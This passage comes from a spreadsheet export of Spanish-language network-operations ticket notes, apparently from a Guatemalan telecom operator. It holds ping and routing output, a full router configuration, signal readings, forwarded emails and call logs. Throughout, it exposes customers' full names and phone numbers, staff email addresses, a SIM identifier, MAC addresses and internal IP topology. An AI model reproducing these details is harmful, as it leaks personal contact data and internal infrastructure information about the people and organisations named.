CC_PANI_FRESH_GT_INTERNET_Z14#
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN INTERNET_GT_METRO 10.105.66.60
  PING 10.105.66.60: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.105.66.60 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/1 MS
RUTA IP:
PE: 10.179.28.20
DISPLAY IP ROUTING-TABLE VPN-INSTANCE INTERNET_GT_METRO 10.105.66.60
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_METRO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.105.66.60/32  DIRECT  0    0                 0.0.0.0         VLANIF3740			</t>
  </si>
  <si>
    <t>SE ENVIA CORREO ALL CLIENTE PARA VALIDACIONES YA QUE EL INCONVENIENTE FUE SU RED INTERNA A ESPERA DE RESPUESTA SE PROCEDE A DEJAR EL TTK EN ETAPA PENDIENTE CLIENTE A ESPERA DE RESPUESTA POR PARTE DEL CLIENTE.</t>
  </si>
  <si>
    <t>F4600516</t>
  </si>
  <si>
    <t xml:space="preserve">SEGUN DISEÑIO SE LLEGA AL CTC NODO Y CLIENTE Y SE TIENE COMUNICACION A NIVEL DE ULTIMA MILLA  EN EL PUNTO REMOTO AL CUAL SE LLEGA CORRECTAMENTE PERO NO SE ALCANZA EL EQUIPO CPE SE PROCEDERA A VALIDAR NUEVAMENTE
CHASSIS 	SLOT 	SIDE 	TYPE 	VERSION
00 	01 	REMOTE A 	1000EAS-X 	1.300-1.044-0.000-0.000
    FIBER 1
    FIBER 2
    UTP 3
    UTP 4
    DEVICE
    SYSTEM
    1Q VLAN
    STORMCONTROL
    LOOPPROTECT
    COUNTERS
    SFP
FIBER2 STATUS AND CONFIGURATION
LINK 	REMOTE B POWER 	OAM RLB STATUS 	OAM LOOPED 	SFP 	D/D
UP 	OK 	OFF 	OFF 	YES 	NO
PORT ACTIVE 	
FIBER SPEED 	
802.3 OAM CHANNEL B MODE 	
AUTO LASER SHUTDOWN(ALS) 	
REMOTE LOOPBACK TEST 	
INGRESS RATE LIMIT (64K ~ 990M) 	
EGRESS RATE LIMIT 	
LINK LOSS FORWARDING EVENT(FIBER POWER OFF)
LOGIC 	FIBER 1 RX LOSS 	UTP 3 LINK LOSS 	UTP 4 LINK LOSS
PING -Q -C 100 -S 100 -M 5 -VPN GESTION_CTC_UNION 10.78.242.123
  PING 10.78.242.123: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.78.242.123 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.79
DISPLAY IP ROUTING-TABLE VPN-INSTANCE GESTION_CTC_UNION 10.78.242.123
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : GESTION_CTC_UNION
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.78.242.123/32  DIRECT  0    0                 0.0.0.0         VLANIF239			</t>
  </si>
  <si>
    <t>SE ENVIA CORREO AL CLIENTE PARA PODER SOLICITAR CONTACTO PARA PRUEBAS DE 1ER NIVEL SE DEJA EN ETAPA PENDIENTE CLIENTE</t>
  </si>
  <si>
    <t>F4600526</t>
  </si>
  <si>
    <t xml:space="preserve">
ENALCE ACTIVO SIN INCONVENIENTES A NIVEL DE CO COBERTURA CON  INDICES DE CONECTIVIDAD OPTIMOS SE PORCEDE A DEJAR EN MONITOREO APRA VALIDAR QUE SE ENCUENTRA DE LA  MISMA MANERA AL TERMIANR TURNO.
WCDMA CHANNEL: 9663		GSM CHANNEL: 65535
GMM (PS) STATE:REGISTERED     	NORMAL SERVICE
MM (CS) STATE: IDLE           	NORMAL SERVICE
WCDMA L1 STATE:L1M_FACH       	RRC STATE:   CELL_FACH
RX LEVEL (DBM):-73
COVERAGE LEVEL: 4 (**** )
CC_TYT_GT_ATM4680 CELLULAR1/0 AT+
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 2 SEMANAS.
UPTIME GENERAL DEL CPE: 2W2D15H1M2S
CONFIGURACION DEL CPE:
SHOW ALL-CONFIG
; SHOWING MENU AND SUBMENUS CONFIGURATION FOR ACCESS-LEVEL 15 ...
; TVROUTER  BASE VDSL2/ADSL METH 30 13 VERSION 10.09.24
   LOG-COMMAND-ERRORS
   NO CONFIGURATION
   DESCRIPTION "DEFAULT CONFIG: STANDARD"
   SET HOSTNAME CC_TYT_GT_ATM4680
   ADD DEVICE PPP 10
   ADD DEVICE TNIP 10
   ADD DEVICE TNIP 20
   ADD DEVICE LOOPBACK 5
   SET DATA-LINK AT CELLULAR1/0
   SET DATA-LINK AT CELLULAR1/1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NETWORK ETHERNET0/0
; -- ETHERNET INTERFACE USER CONFIGURATION --
      DESCRIPTION "LAN DEL CLIENTE"
;
      IP ADDRESS 10.233.153.201 255.255.255.252
;
;
   EXIT
;
   NETWORK ETHERNET0/1
; -- ETHERNET INTERFACE USER CONFIGURATION --
      DESCRIPTION "WAN PRINCIPAL/_/47503804T/_/"
;
      IP ADDRESS 10.87.31.138 255.255.255.128
;
;
   EXIT
;
   NETWORK PPP10
; -- GENERIC PPP USER CONFIGURATION --
      DESCRIPTION " TEL  42973384 ICC  8950201017773243026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805T/_/"
;
      IP ADDRESS UNNUMBERED PPP10
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 10
      LOAD-INTERVAL 60
      ENABLE
      MODE GRE IP
      SOURCE PPP10
      DESTINATION 1.2.3.4
      KEEPALIVE 3S 10
   EXIT
;
;
   NETWORK TNIP20
; -- IP TUNNEL NET CONFIGURATION --
      IP ADDRESS UNNUMBERED PPP10
;
      IP MTU 1380
      IP RELATIVE-WEIGHT 20
      LOAD-INTERVAL 60
      ENABLE
      MODE GRE IP
      SOURCE PPP10
      DESTINATION 4.3.2.1
      KEEPALIVE 3S 10
   EXIT
;
   NETWORK LOOPBACK5
; -- LOOPBACK INTERFACE CONFIGURATION --
      DESCRIPTION "MONITOREO DEL CNOC"
;
      IP ADDRESS 10.212.177.254 255.255.255.255
;
   EXIT
;
;
;
;
;
;
   PROTOCOL IP
; -- INTERNET PROTOCOL USER CONFIGURATION --
      MANAGEMENT-IP-ADDRESS 10.212.177.254
      ROUTER-ID 10.212.177.254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87.31.138 DEFAULT
      INTERFACE 10.87.31.138 AREA 0.0.1.101
      INTERFACE 10.87.31.138 HELLO-INTERVAL 1S
      INTERFACE 10.87.31.138 NETWORK-TYPE BROADCAST
      INTERFACE 10.87.31.138 DEAD-INTERVAL 4S
      INTERFACE 10.87.31.138 ROUTER-PRIORITY 0
;
      INTERFACE 10.233.153.201 DEFAULT
      INTERFACE 10.233.153.201 AREA 0.0.1.101
;
      INTERFACE 10.212.177.254 DEFAULT
      INTERFACE 10.212.177.254 AREA 0.0.1.101
;
      NEIGHBOR ETHERNET0/1 10.87.31.129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51.237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ENABLE
      EXIT
;
   EXIT
;
   DUMP-COMMAND-ERRORS
   END
CC_TYT_GT_ATM4680 CONFIG$
TABLA ARP DEL ROUTER CPE:
 DUMP ETHERNET0/1
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
A4-BE-2B-E5-93-47     10.87.31.129     240
00-A0-26-C6-57-25     10.87.31.134     221
00-A0-26-C6-56-55     10.87.31.135     221
CC_TYT_GT_ATM4680 ARP+
DUMP ETHERNET0/0
ARP ENTRIES FOR IP PROTOCOL
MAC ADDRESS           IP ADDRESS       TIMEOUT(MIN)
30-0E-D5-2B-F3-05     10.233.153.202   239
CC_TYT_GT_ATM4680 ARP+
INTERFACES DEL ROUTER:
ETHERNET0/0  UP
ETHERNET0/1  UP
ETHERNET0/2  DOWN
ATM0/0  DOWN
CELLULAR1/0  UP
CELLULAR1/1  UP
PPP10  UP
TNIP10  UP
TNIP20  UP
LOOPBACK5  UP
INTERFACE IP ADDRESSES:
-----------------------
ETHERNET0/0        10.233.153.201/30
ETHERNET0/1        10.87.31.138/25
PPP10              UNNUMBERED - USING GLOBAL-ADDRESS (10.218.51.237)
TNIP10             UNNUMBERED - USING GLOBAL-ADDRESS (0.0.0.0)
TNIP20             UNNUMBERED - USING GLOBAL-ADDRESS (0.0.0.0)
LOOPBACK5          10.212.177.254/32
SPECIAL IP ADDRESSES:
---------------------
INTERNAL-ADDRESS    0.0.0.0
MANAGEMENT-ADDRESS  10.212.177.254
ROUTER-ID           10.212.177.254
GLOBAL-ADDRESS      10.212.177.254
CC_TYT_GT_ATM4680 IP+
ESTADO Y NIVELES DE RED 3G/LTE:
QUERYING...PLEASE WAIT...
REGISTRATION STATE: HOME NETWORK
PLMN PUBLIC LAND MOBILE NETWORK CODE: 70401
PLMN PUBLIC LAND MOBILE NETWORK NAME: CLAROGTM
CELL LOCATION AREA CODE 0X019E (414), IDENTIFICATION 0X9AA5 (39589)
SYSTEM MODE WCDMA, SERVICE DOMAIN: PS
NETWORK TECHNOLOGY CURRENTLY IN USE: HSDPA/HSUPA
RECEIVE SIGNAL CODE POWER OF THE ACTIVE SET'S STRONGEST CELLS(RSCP):  -74 DBM	
TOTAL ENERGY PER CHIP PER POWER DENSITY VALUE OF SET'S STRONGEST CELLS(ECIO):  -1.5 DB	
LAST ECIO MEASURED IN WCDMA DATA MODE:  -4.0 DB	
PRIMARY SCRAMBLING CODE (PSC) 0X0177 (375)
OPERATIONAL STATUS
00000C00
 PSC: 00B8
 SSC: 0000
 STTD: 00
 TOT EC/IO:	MODE:        ONLINE
SYSTEM MODE:   WCDMA      	PS STATE:    ATTACHED
WCDMA BAND:    WCDMA1900  	GSM BAND:    UNKNOWN
WCDMA CHANNEL: 9663		GSM CHANNEL: 65535
GMM (PS) STATE:REGISTERED     	NORMAL SERVICE
MM (CS) STATE: IDLE           	NORMAL SERVICE
WCDMA L1 STATE:L1M_FACH       	RRC STATE:   CELL_FACH
RX LEVEL (DBM):-73
COVERAGE LEVEL: 4 (**** )
CC_TYT_GT_ATM4680 CELLULAR1/0 AT+
PING HACIA ROUTER CPE:
PING -Q -C 100 -S 100 -M 5 -VPN TRANSFERENCIAS 10.87.31.138
  PING 10.87.31.138: 100  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.87.31.138 PING STATISTICS ---
    100 PACKET(S) TRANSMITTED
    100 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
RUTA IP:
PE: 10.179.28.41
DISPLAY IP ROUTING-TABLE VPN-INSTANCE TRANSFERENCIAS 10.87.31.138
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : TRANSFERENCIAS
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
   10.87.31.138/32  DIRECT  0    0                 0.0.0.0         VLANIF10			</t>
  </si>
  <si>
    <t>F4600558</t>
  </si>
  <si>
    <t>ENLACE OPERATIVO SE PROCEDE CON CIERRE POR ENERGIA COMERCIAL
&lt;CHMLGTCMN1T2C06B02EIM2&gt;PIN  -VP INTERNET_GT_DEPTAL 10.87.24.43                   PING 10.87.24.43: 56  DATA BYTES, PRESS CTRL_C TO BREAK
    REPLY FROM 10.87.24.43: BYTES=56 SEQUENCE=1 TTL=255 TIME=1 MS
    REPLY FROM 10.87.24.43: BYTES=56 SEQUENCE=2 TTL=255 TIME=1 MS
    REPLY FROM 10.87.24.43: BYTES=56 SEQUENCE=3 TTL=255 TIME=2 MS
    REPLY FROM 10.87.24.43: BYTES=56 SEQUENCE=4 TTL=255 TIME=1 MS
    REPLY FROM 10.87.24.43: BYTES=56 SEQUENCE=5 TTL=255 TIME=1 MS
  --- 10.87.24.43 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    5 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/2 MS
&lt;CHMLGTCMN1T2C06B02EIM2&gt;
PE 10.179.28.32
&lt;CHMLGTCMN1T2C06B02EIM2&gt;DIS IP ROUTING-TABLE VP INTERNET_GT_DEPTAL 10.87.24.43
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : INTERNET_GT_DEPTAL
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    10.87.24.43/32  DIRECT  0    0                 0.0.0.0         VLANIF3750</t>
  </si>
  <si>
    <t>F4600562</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MOISES MENDEZ AL 30727797 CONTESTA EL SEÑOR CARLOS INDICA QUE YA VE ESTABLE Y OPERATIVO EL SERVICIO SOLICITA QUE SE DEJE EN OBSERVACION 24 HRS Y QUE SE LE LLAME PARA CONFIRMAR**
-ID 3001022710
**</t>
  </si>
  <si>
    <t>F4600583</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  ROXANA CRUZ 42016092  QUIEN CONFIRMA EL FUNCIONAMIENTO DEL SERVICIO
-ID 3001171914</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE ROXANA CRUZ AL 42016092 INDICA QUE EL TECNICO INTERNO AUN ESTA TRABAJANDO SOLICITA QUE SE LE LLAME A LAS 10:00 AM NUEVAMENTE**
-ID 3001040217
**</t>
  </si>
  <si>
    <t>SE VALIDAN PRUEBAS CON CLIENTE ROXANA
3001078932
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 7753
DURACIÓN: 0:06:11
ESTADO: CONECTADA
DETALLES: 7753
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: LUVY.SANDOVAL
FECHA Y HORA LOCALES: 14/06/2022 11:02:01</t>
  </si>
  <si>
    <t>SE CAMBIA A MONITOREO HASTA LAS 15:00 HORAS, PARA VALIDAR ESTADO OPERATIVO ESTABLE DEL SERVICIO
NÚMERO: 7753
FIN: HOY, 11:16
ID DE LLAMADA: 3001078932</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE ROXANA CRUZ AL 42016092 - 24740510 SOLICITA QUE  SE LE LLAME A LAS 8:30 YA QUE NO TIENEN NADA CONECTADO INDICA QUE REALIZARON UN CAMBIO DE EQUIPO Y LES ESTARA VISITANDO A LAS 8:00 SU TECNICO INTERNO PARA HACER LAS CONEXIONES **
-ID 3001013887 - 3001014121
**</t>
  </si>
  <si>
    <t>SE LLAMA  A CLIENTE ROXANA CRUZ 42016092 - 24740510 NO RESPONDE, SE INTENTARA LUEGO
-ID 3001167034 - 3001167749</t>
  </si>
  <si>
    <t>F4600587</t>
  </si>
  <si>
    <t>***--- SE SOLICITA VALIDAR CIERRE A CL YA QUE ENVÍA CORREO INDICANDO QUE EL SERVICIO ESTA ARRIBA --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MARTES, 14 DE JUNIO DE 2022 05:18
PARA: ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; RAUL ENMANUEL ALVAREZ MARROQUIN &lt;RAULE.ALVAREZ@CLARO.COM.GT&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 644081::: TICKET CNOC IMMAB000206::: "FUERA DE SERVICIO"
BUENOS DÍAS ESTIMADO SR. ESTRADA.
                GRACIAS POR LA INFORMACIÓN, PODRÍA INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
DE NUESTRO LADO NO SE REALIZÓ CORRECCIÓN Y NO SE OBSERVARON EVENTOS EN NUESTRA RED.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t xml:space="preserve">               SE VALIDA EL ETX 1300 DEL NODO DONDE SE EOBSERVA CAIDO EL PUESTO OPTICO QUE CONECTA CON EL CLIENTE ES NECESARIO REALIZAR PRUEBAS DE PRIMER NIVEL EN EL CLIENTE  PARA PODER DESCARTA PROBLEMAS DE ENERGIA EN EL LUGAR
    ETX-1300 - ETX_SAN_63_#1
PHYSICAL LAYER &gt; FE STATUS
 *. PORT NAME                               (644081_IN_MABE-HONDURAS-BARON)
 *. PORT ROLE                               (USER PORT)
 *. ADMINISTRATIVE STATUS                   (ENABLE)
 *. OPERATIONAL STATUS                      &lt;DOWN&gt;
 *. AUTO NEGOTIATION                        (DISABLE)
 *. SPEED AND DUPLEX                        &lt;100M-FX FULL DUPLEX&gt;
 1. PORT NUM[1-32]                          (29)
DISEÑIO DE SM
&gt;
PE  CSPSHNPPN1D1FFC3 10.192.129.118 -----CSPSHNPPN1D1ECD1 ------CSPSHNTMN1D1FFC1 10.192.129.119 ----- CSPSHNTMN1D1IGM1------CSPSHNVIN1D1I1M1 10.195.14.66 GI1/40 ENLACE_ETX1300 (10.82.35.80) FE29 -------IMC REMOTO ---CPE .
PE  CSPSHNPPN1D1FFC3 10.192.129.118 -----CSPSHNPPN1D1ECD1 ------CSPSHNTMN1D1FFC1 10.192.129.119 ----- CSPSHNTMN1D1IGM1------CSPSHNVIN1D1I1M1 10.195.14.66 GI1/40 ENLACE_ETX1300 (10.82.35.80) FE29 -------IMC REMOTO ---CPE .
PE  CSPSHNPPN1D1FFC3 10.192.129.118 -----CSPSHNPPN1D1ECD1 ------CSPSHNTMN1D1FFC1 10.192.129.119 ----- CSPSHNTMN1D1IGM1------CSPSHNVIN1D1I1M1 10.195.14.66 GI1/40 ENLACE_ETX1300 (10.82.35.80) FE29 -------IMC REMOTO ---CPE .
PE  CSPSHNPPN1D1FFC3 10.192.129.118 -----CSPSHNPPN1D1ECD1 ------CSPSHNTMN1D1FFC1 10.192.129.119 ----- CSPSHNTMN1D1IGM1------CSPSHNVIN1D1I1M1 10.195.14.66 GI1/40 ENLACE_ETX1300 (10.82.35.80) FE29 -------IMC REMOTO ---CPE .</t>
  </si>
  <si>
    <t>F4600609</t>
  </si>
  <si>
    <t>***--- SE ENVÍA CORREO A CL SOLICITANDO CONTACTOS REMOTOS --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: MARTES, 14 DE JUNIO DE 2022 01:53
PARA: ESTRADA BUSTOS VICTOR MANUEL &lt;VEBUSTOS@UNINET.COM.MX&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL ¿ GTXXM88901-5::: TICKET CNOC IMVOL007941::: "FUERA DE SERVICIO"
ESTIMADO SR. ESTRADA.
                PERSONAL A CARGO NOS INDICA QUE ES NECESARIO REALIZAR PRUEBAS CON LOS EQUIPOS EN EL PUNTO REMOTO.
PODRÍA APOYARNOS INDICANDO LOS CONTACTOS Y EL HORARIO PARA REALIZAR DICHAS PRUEBAS.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.</t>
  </si>
  <si>
    <t>***---  CL CONSULTA DETALLES DE LO OCURRIDO E INDICA QUE YA VE ESTABLE EL SERVICIO ---*
DE: ESTRADA BUSTOS VICTOR MANUEL [MAILTO:VEBUSTOS@UNINET.COM.MX]
ENVIADO EL: MARTES, 14 DE JUNIO DE 2022 04:09
PARA: EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL ¿ GTXXM88901-5::: TICKET CNOC IMVOL007941::: "FUERA DE SERVICIO"
EQUIPO,
SERVICIO ESTABLE POR FAVOR DE COMPARTIR ACTUALIZACIÓN.</t>
  </si>
  <si>
    <t>F4600613</t>
  </si>
  <si>
    <t>***--- CLIENTE RESPONDE CORREO --**
DE: JEZIEL MOLINA [MAILTO:JMOLINA@ASINETWORKHN.COM]
ENVIADO EL: MARTES, 14 DE JUNIO DE 2022 04:54
PARA: IVAN JOSE MEJIA PETZ &lt;IVAN.MEJIA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
CC: NOC ASI NETWORKS &lt;DEPARTAMENTODENOC@ASINETWORKHN.COM&gt;; MARCOS &lt;INGENIERIA@ASINETWORKHN.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; NOC &lt;NOC@CLARO.COM.HN&gt;; CLIENTES CORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.HN&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; NIVEL 2 VIP &lt;NIVEL2.VIP@CLARO.COM.HN&gt;
ASUNTO: RE: SANTA BARBARA DOWN: ID1663590
ESTIMADOS
EL ENLACE NOS LO ENTREGAN DIRECTAMENTE EN UN PUERTO SFP EN NUESTRO CCR, AJDUNTO  MAC
64:D1:54:F7:49:72</t>
  </si>
  <si>
    <t>F4600616</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AXEL MARTINEZ AL  4230 6217 INDICA QUE EL SERVICIO ESTA ESTABLE Y OPERATIVO QUE FUE POR PROBLEMA DE ENERGIA **
ID 3001018738
**</t>
  </si>
  <si>
    <t>F4600617</t>
  </si>
  <si>
    <t>F4600621</t>
  </si>
  <si>
    <t>F4600687</t>
  </si>
  <si>
    <t xml:space="preserve">ENLACE CAIDO A NIVEL WAN SE PORCEDE A DEJER EN ETAPA PENDIENTE CLIENTE POR ENERGIA COMERCIAL.
NO SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE CAÍDO.
PING HACIA ROUTER CPE:
PING -M 10 -Q -VPN PRONE 10.78.153.102
  PING 10.78.153.102: 56  DATA BYTES, PRESS CTRL_C TO BREAK
  --- 10.78.153.102 PING STATISTICS ---
    5 PACKET(S) TRANSMITTED
    0 PACKET(S) RECEIVED
    100.00% PACKET LOSS
RUTA IP:
PE: 10.179.28.15
DISPLAY IP ROUTING-TABLE VPN-INSTANCE PRONE 10.78.153.102
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : PRONE
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
  10.78.153.102/32  DIRECT  0    0                 0.0.0.0         VLANIF43			</t>
  </si>
  <si>
    <t>F4600792</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTIAN JIMENEZ  AL 31859746 NO CONTESTA ENVIA A BUZON || SE INTENTARA LUEGO **
-ID 2001091991
**</t>
  </si>
  <si>
    <t>F4600805</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO HERNANDEZ RUEDA AL 99202007 CONFIRMA SERVICIO ESTABLE Y OPERATIVO  **
-ID 3001086274
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO HERNANDEZ RUEDA AL 99202007 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001015508
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MARCO HERNANDEZ RUEDA AL 99202007 NO RESPONDE || SE INTENTARA LUEGO **
-ID 3001033947
**</t>
  </si>
  <si>
    <t>F4600809</t>
  </si>
  <si>
    <t>CLIENTE ESTUARDO CRISTY LLAMA DEL 22258300 ID 3001034926PARA EL SEGUIMIENTO DEL CASO SD1134843 SE LE INFORMA QUE SERA TRANSFERIDA CON EL GESTOR A CARGO JURGEN.BOCH AL 8126 ID 3001035940 INGRESA CON YENSI NO RESPONDE SE LLAMA NUEVAMENTE ID 3001036072 INGRESO CON ÁNGEL TORRES NO RESPONDE DERIVA LA LLAMADA CON MARLON RAMOS NO RESPONDE Y DERIVA LA LLAMADA CON ÁNGEL RODRIGUEZ NO RESPONDE SE ESCALA CON JUAN MANUEL CARDONA AL 41287321 ID 3001036905 COMUNICA AL GESTOR SE LE BRINDA LA INFORMACIÓN Y SE DEJA EN LINEA.</t>
  </si>
  <si>
    <t>F4600812</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE CRISTI CASTRO  AL 43701142  CONTESTA EL SEÑOR JULIO INFORMA QUE AUN NO TIENE SERVICIO QUE LE APARECE SIN ACCESO A INTERNET || SE NOTIFICA A GESTOR **
-ID 3001045496 - 3001047285
**</t>
  </si>
  <si>
    <t>F4600817</t>
  </si>
  <si>
    <t>SE CONTACTA CON CLIENTE NELSON RIVAS - KELVIN HERRERA 62005433 - 76010216
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>SE PROCEDE A VALIDAR NELSON RIVAS - KELVIN HERRERA 62005433 - 76010216
##LLAMADA DESDE VIVO</t>
  </si>
  <si>
    <t>F4600824</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO PEREZ AL 36571015 INDICA QUE AUN NO TIENE SERVICIO Y EL EQUIPO NO TIENE ENCENDIDA LA LUZ WLAN Y DEL MEDIA CONVERTER INIDA QUE LA QUE ESTA PARPADEANDO  LA LUZ LNK || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001015916
**
**</t>
  </si>
  <si>
    <t>F4600827</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE JULIO  PONCE AL 78563958  CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 3001049315
**</t>
  </si>
  <si>
    <t>F4600829</t>
  </si>
  <si>
    <t>SE HABLA CON CLIENTE RICARDO CASTILLO 76029460 SE LE COMENTA QUE SERVICIO SE HA DADO DE BAJA, CLIENTE INDICA QUE YA ESTÁ EN COMUNICACIÓN CON SU EJECUTIVO DE CUENTA PARA SOLICITAR OT PARA DAR DE ALTA AL SERVICIO. CLIENTE AUTORIZA EL CIERRE DEL CASO.
3001105663
COLA:
NOMBRE: A: 0050376029460
NÚMERO: 0050376029460
DURACIÓN: 0:01:54
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 0050376029460
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 14/06/2022 12:07:00 P. M.</t>
  </si>
  <si>
    <t>CLIENTE RICARDO CASTILLO 76029460  APOYA A UBICAR EQUIPO AETHRA SV22P1, TAMBIÉN UBICA EQUIPO ETX-1 PROCEDE A REINICIAR AMBOS EQUIPOS PERO E1 SIGUE CAIDO, CLIENTE SOLICITA VISITA TÉCNICA. 3001022677</t>
  </si>
  <si>
    <t>F4600830</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MISAEL TORRES AL 78021132 CLIENTE CONFIRMA SERVICIO ESTABLE Y OPERATIVO**
-ID 3001021556
**</t>
  </si>
  <si>
    <t>F4600833</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE MAYRA ACOSTA AL 70807444 INDICA QUE PERSISTE EL INCONVENIENTE || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 3001053364
**</t>
  </si>
  <si>
    <t>F4600836</t>
  </si>
  <si>
    <t>SE BRINDAN AVANCES DEL TICKET A JONATHAN FLORES/CLIENTE; SE LE INDICA QUE PERSONAL TÉCNICO YA ESTÁ TIRANDO LA FO DE ABONADO, AVANCES EN UNA HORA.</t>
  </si>
  <si>
    <t>F4600849</t>
  </si>
  <si>
    <t>SE RECIBE CORREO POR PARTE DE CLIENTE , EN DONDE INDICA QUE SE EFECTUARA LA VISITA, Y SE RESPONDE CONSULTANDO SI LOS TÉCNICO YA SE PUEDEN PRESENTAR A LAS INSTALACIONES PARA LA REVISÓN DEL SERVICIO
DE: DIONICIO VELIZ CERON &lt;DIONICIO.VELIZ@CLARO.COM.GT&gt;
ENVIADO: MARTES, 14 DE JUNIO DE 2022 13:57
CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: RV: SOLICITUD DE PERMISOS | 425500012T | DIVISION DMC GUATEMALA S.A.
BUENA TARDE  ESTIMADO CLIENTE, UN GUSTO SALUDARLE.
